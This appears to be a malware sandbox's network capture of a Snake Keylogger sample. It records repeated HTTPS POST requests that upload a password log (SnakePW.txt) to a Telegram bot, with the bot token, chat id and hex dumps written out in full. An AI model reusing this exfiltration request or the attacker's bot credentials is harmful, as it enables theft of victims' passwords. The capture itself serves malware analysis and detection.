                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:39 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:39 UTC241INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66906,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228819,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            143192.168.2.549998149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:39 UTC241OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f8acb278
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:39 UTC241OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 38 61 63 62 32 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f8acb278Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:39 UTC242INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:39 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:39 UTC242INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66907,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228819,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            144192.168.2.549999149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:39 UTC243OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f8ea30bb
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:39 UTC243OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 38 65 61 33 30 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f8ea30bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:40 UTC244INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:40 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:40 UTC244INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66908,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228820,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            145192.168.2.550000149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:40 UTC244OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f92f01a8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:40 UTC245OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 39 32 66 30 31 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f92f01a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:40 UTC245INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:40 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:40 UTC246INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66909,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228820,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            146192.168.2.550001149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:40 UTC246OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f98a9311
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:40 UTC246OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 39 38 61 39 33 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f98a9311Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:41 UTC247INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:41 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:41 UTC247INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66910,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228821,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            147192.168.2.550002149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:41 UTC248OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f9e0108d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:41 UTC248OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 39 65 30 31 30 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f9e0108dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:41 UTC249INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:41 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:41 UTC249INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66911,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228821,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            148192.168.2.550003149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:41 UTC249OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fa1d1fc1
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:41 UTC250OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 61 31 64 31 66 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fa1d1fc1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:42 UTC250INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:42 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:42 UTC251INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66912,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228822,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            149192.168.2.550004149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:42 UTC251OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fa587ead
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:42 UTC251OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 61 35 38 37 65 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fa587eadContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:42 UTC252INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:42 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
